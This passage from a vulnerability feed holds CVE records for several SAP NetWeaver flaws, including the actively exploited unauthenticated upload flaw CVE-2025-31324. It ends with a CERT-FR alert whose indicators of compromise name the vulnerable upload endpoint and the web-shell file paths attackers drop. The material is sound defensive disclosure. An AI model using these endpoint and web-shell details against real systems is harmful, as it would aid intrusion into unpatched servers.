      "title": "Server-Side Request Forgery in SAP NetWeaver",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
    "assignerShortName": "sap",
    "cveId": "CVE-2024-27898",
    "datePublished": "2024-04-09T00:52:54.390Z",
    "dateReserved": "2024-02-27T06:26:16.786Z",
    "dateUpdated": "2024-08-21T15:07:15.427Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-25644 (GCVE-0-2024-25644)

Vulnerability from cvelistv5 – Published: 2024-03-12 00:33 – Updated: 2024-09-28 22:24
Summary
Under certain conditions, SAP NetWeaver WSRM version 7.50 allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application.
CWE
  • CWE-732 - Incorrect Permission Assignment for Critical Resource
Assigner
sap
Impacted products

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T23:44:09.806Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://me.sap.com/notes/3425682"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:sap:netweaver:7.5:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unaffected",
            "product": "netweaver",
            "vendor": "sap",
            "versions": [
              {
                "status": "affected",
                "version": "7.5"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-25644",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-05T17:39:57.790456Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-05T17:43:45.543Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "NetWeaver (WSRM)",
          "vendor": "SAP_SE",
          "versions": [
            {
              "status": "affected",
              "version": "7.50"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eUnder certain conditions SAP NetWeaver\u00a0WSRM\u00a0- version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application.\u003c/p\u003e"
            }
          ],
          "value": "Under certain conditions SAP NetWeaver\u00a0WSRM\u00a0- version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-732",
              "description": "CWE-732: Incorrect Permission Assignment for Critical Resource",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-09-28T22:24:11.195Z",
        "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "shortName": "sap"
      },
      "references": [
        {
          "url": "https://me.sap.com/notes/3425682"
        },
        {
          "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Information Disclosure vulnerability in NetWeaver (WSRM)",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
    "assignerShortName": "sap",
    "cveId": "CVE-2024-25644",
    "datePublished": "2024-03-12T00:33:44.473Z",
    "dateReserved": "2024-02-09T04:10:20.036Z",
    "dateUpdated": "2024-09-28T22:24:11.195Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2025-42968 (GCVE-0-2025-42968)

Vulnerability from nvd – Published: 2025-07-08 00:36 – Updated: 2025-07-08 16:13
Summary
SAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module, which could grant access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application.
CWE
Assigner
sap
Impacted products
Vendor Product Version
SAP_SE SAP NetWeaver (RFC enabled function module) Affected: SAP_BW 700
Affected: 701
Affected: 702
Affected: 710
Affected: 731
Affected: 740
Affected: 750
Affected: 751
Affected: 752
Affected: 753
Affected: 754
Affected: 755
Affected: 756
Affected: 757
Affected: 758
Affected: 816
Affected: 914
Affected: 916

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-42968",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-07-08T14:29:01.927973Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-07-08T16:13:36.672Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SAP NetWeaver (RFC enabled function module)",
          "vendor": "SAP_SE",
          "versions": [
            {
              "status": "affected",
              "version": "SAP_BW 700"
            },
            {
              "status": "affected",
              "version": "701"
            },
            {
              "status": "affected",
              "version": "702"
            },
            {
              "status": "affected",
              "version": "710"
            },
            {
              "status": "affected",
              "version": "731"
            },
            {
              "status": "affected",
              "version": "740"
            },
            {
              "status": "affected",
              "version": "750"
            },
            {
              "status": "affected",
              "version": "751"
            },
            {
              "status": "affected",
              "version": "752"
            },
            {
              "status": "affected",
              "version": "753"
            },
            {
              "status": "affected",
              "version": "754"
            },
            {
              "status": "affected",
              "version": "755"
            },
            {
              "status": "affected",
              "version": "756"
            },
            {
              "status": "affected",
              "version": "757"
            },
            {
              "status": "affected",
              "version": "758"
            },
            {
              "status": "affected",
              "version": "816"
            },
            {
              "status": "affected",
              "version": "914"
            },
            {
              "status": "affected",
              "version": "916"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eSAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application.\u003c/p\u003e"
            }
          ],
          "value": "SAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "CWE-862: Missing Authorization",
              "lang": "eng",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-08T00:36:31.953Z",
        "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "shortName": "sap"
      },
      "references": [
        {
          "url": "https://me.sap.com/notes/3621037"
        },
        {
          "url": "https://url.sap/sapsecuritypatchday"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Missing Authorization check in SAP NetWeaver (RFC enabled function module)",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
    "assignerShortName": "sap",
    "cveId": "CVE-2025-42968",
    "datePublished": "2025-07-08T00:36:31.953Z",
    "dateReserved": "2025-04-16T13:25:42.158Z",
    "dateUpdated": "2025-07-08T16:13:36.672Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2025-42999 (GCVE-0-2025-42999)

Vulnerability from nvd – Published: 2025-05-13 00:17 – Updated: 2025-10-21 22:55
Summary
SAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system.
CWE
  • CWE-502 - Deserialization of Untrusted Data
Assigner
sap
Impacted products

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-42999",
                "options": [
                  {
                    "Exploitation": "active"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-05-17T03:55:58.995900Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          },
          {
            "other": {
              "content": {
                "dateAdded": "2025-05-15",
                "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-42999"
              },
              "type": "kev"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-21T22:55:16.662Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "government-resource"
            ],
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-42999"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2025-05-15T00:00:00+00:00",
            "value": "CVE-2025-42999 added to CISA KEV"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-05-13T16:29:26.892Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
          }
        ],
        "title": "CVE Program Container",
        "x_generator": {
          "engine": "ADPogram 0.0.1"
        }
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SAP NetWeaver (Visual Composer development server)",
          "vendor": "SAP_SE",
          "versions": [
            {
              "status": "affected",
              "version": "VCFRAMEWORK 7.50"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eSAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system.\u003c/p\u003e"
            }
          ],
          "value": "SAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "eng",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-13T01:38:43.612Z",
        "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "shortName": "sap"
      },
      "references": [
        {
          "url": "https://me.sap.com/notes/3604119"
        },
        {
          "url": "https://url.sap/sapsecuritypatchday"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Insecure Deserialization in SAP NetWeaver (Visual Composer development server)",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
    "assignerShortName": "sap",
    "cveId": "CVE-2025-42999",
    "datePublished": "2025-05-13T00:17:43.710Z",
    "dateReserved": "2025-04-16T13:25:50.942Z",
    "dateUpdated": "2025-10-21T22:55:16.662Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2025-31324 (GCVE-0-2025-31324)

Vulnerability from nvd – Published: 2025-04-24 16:50 – Updated: 2025-10-21 22:55
Summary
SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing an unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
CWE
  • CWE-434 - Unrestricted Upload of File with Dangerous Type
Assigner
sap
Impacted products

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-31324",
                "options": [
                  {
                    "Exploitation": "active"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-30T03:56:21.966706Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          },
          {
            "other": {
              "content": {
                "dateAdded": "2025-04-29",
                "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31324"
              },
              "type": "kev"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-21T22:55:17.980Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "technical-description"
            ],
            "url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
          },
          {
            "tags": [
              "government-resource"
            ],
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31324"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2025-04-29T00:00:00+00:00",
            "value": "CVE-2025-31324 added to CISA KEV"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-05-02T17:13:30.650Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://www.theregister.com/2025/04/25/sap_netweaver_patch/"
          },
          {
            "url": "https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/"
          },
          {
            "url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
          }
        ],
        "title": "CVE Program Container",
        "x_generator": {
          "engine": "ADPogram 0.0.1"
        }
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SAP NetWeaver (Visual Composer development server)",
          "vendor": "SAP_SE",
          "versions": [
            {
              "status": "affected",
              "version": "VCFRAMEWORK 7.50"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eSAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.\u003c/p\u003e"
            }
          ],
          "value": "SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-434",
              "description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
              "lang": "eng",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-04-24T16:50:27.706Z",
        "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "shortName": "sap"
      },
      "references": [
        {
          "url": "https://me.sap.com/notes/3594142"
        },
        {
          "url": "https://url.sap/sapsecuritypatchday"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Missing Authorization check in SAP NetWeaver (Visual Composer development server)",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
    "assignerShortName": "sap",
    "cveId": "CVE-2025-31324",
    "datePublished": "2025-04-24T16:50:27.706Z",
    "dateReserved": "2025-03-27T23:02:06.906Z",
    "dateUpdated": "2025-10-21T22:55:17.980Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27898 (GCVE-0-2024-27898)

Vulnerability from nvd – Published: 2024-04-09 00:52 – Updated: 2024-08-21 15:07
Summary
SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a Server-Side Request Forgery vulnerability. This has a low impact on confidentiality.
CWE
  • CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
sap
Impacted products
Vendor Product Version
SAP_SE SAP NetWeaver Affected: 7.50

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:41:55.785Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://me.sap.com/notes/3425188"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "netweaver",
            "vendor": "sap",
            "versions": [
              {
                "status": "affected",
                "version": "7.50"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27898",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-21T15:05:55.533542Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-21T15:07:15.427Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SAP NetWeaver",
          "vendor": "SAP_SE",
          "versions": [
            {
              "status": "affected",
              "version": "7.50"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eSAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a\u00a0Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.\u003c/p\u003e"
            }
          ],
          "value": "SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a\u00a0Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.\n\n"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "eng",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-04-09T00:52:54.390Z",
        "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "shortName": "sap"
      },
      "references": [
        {
          "url": "https://me.sap.com/notes/3425188"
        },
        {
          "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Server-Side Request Forgery in SAP NetWeaver",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
    "assignerShortName": "sap",
    "cveId": "CVE-2024-27898",
    "datePublished": "2024-04-09T00:52:54.390Z",
    "dateReserved": "2024-02-27T06:26:16.786Z",
    "dateUpdated": "2024-08-21T15:07:15.427Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-25644 (GCVE-0-2024-25644)

Vulnerability from nvd – Published: 2024-03-12 00:33 – Updated: 2024-09-28 22:24
Summary
Under certain conditions SAP NetWeaver WSRM - version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application.
CWE
  • CWE-732 - Incorrect Permission Assignment for Critical Resource
Assigner
sap
Impacted products

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T23:44:09.806Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://me.sap.com/notes/3425682"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:sap:netweaver:7.5:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unaffected",
            "product": "netweaver",
            "vendor": "sap",
            "versions": [
              {
                "status": "affected",
                "version": "7.5"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-25644",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-05T17:39:57.790456Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-05T17:43:45.543Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "NetWeaver (WSRM)",
          "vendor": "SAP_SE",
          "versions": [
            {
              "status": "affected",
              "version": "7.50"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eUnder certain conditions SAP NetWeaver\u00a0WSRM\u00a0- version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application.\u003c/p\u003e"
            }
          ],
          "value": "Under certain conditions SAP NetWeaver\u00a0WSRM\u00a0- version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-732",
              "description": "CWE-732: Incorrect Permission Assignment for Critical Resource",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-09-28T22:24:11.195Z",
        "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "shortName": "sap"
      },
      "references": [
        {
          "url": "https://me.sap.com/notes/3425682"
        },
        {
          "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Information Disclosure vulnerability in NetWeaver (WSRM)",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
    "assignerShortName": "sap",
    "cveId": "CVE-2024-25644",
    "datePublished": "2024-03-12T00:33:44.473Z",
    "dateReserved": "2024-02-09T04:10:20.036Z",
    "dateUpdated": "2024-09-28T22:24:11.195Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CERTFR-2025-ALE-005

Vulnerability from certfr_alerte - Published: - Updated:

On 24 April 2025, SAP published a security bulletin concerning vulnerability CVE-2025-31324, which allows remote arbitrary code execution by an unauthenticated user. This vulnerability is caused by a security policy bypass that allows arbitrary, potentially executable files to be uploaded to the server. It affects the Visual Composer development server component, which is not installed by default but is frequently used.

CERT-FR is aware of several compromises linked to this vulnerability.

Access to the full details of this vulnerability ([1] [2]) requires an SAP support user account. The security bulletin of 8 April 2025 was updated to list this new vulnerability without mentioning its active exploitation.

Identifying the vulnerable component

It is possible to check whether the vulnerable Visual Composer development server component is enabled via the URL http://hote:port/nwa/sysinfo and to look for the presence of the VISUAL COMPOSER FRAMEWORK component (VCFRAMEWORK.SCA or VCFRAMEWORK). If the line reads NO, the component is not installed.

Solutions

Before applying the security patch, it is necessary to check that no file with the extension jsp, java or class is present in the following folders:
  • C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
  • C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work
  • C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync

In addition, the web server logs must be checked for:
  • accesses to the URL /developmentserver/metadatauploader via a POST request returning HTTP code 200 without authentication;
  • accesses to URLs of the form /irj/helper.jsp, /irj/cache.jsp or /irj/\w{8}.jsp [3].

Finally, [4] can be consulted for other indicators of compromise. Note: these indicators have not been qualified by CERT-FR.

If malicious files or suspicious log entries are present:
  • report the event to CERT-FR, copying your sector CSIRTs where applicable, and consult the recommended first steps in the event of an intrusion on your information system [5];
  • completely isolate the affected machine from the network, from the Internet as well as from the internal network, in order to limit the risk of lateral movement;
  • if a virtual appliance is in use, take a snapshot of the file system and of the memory;
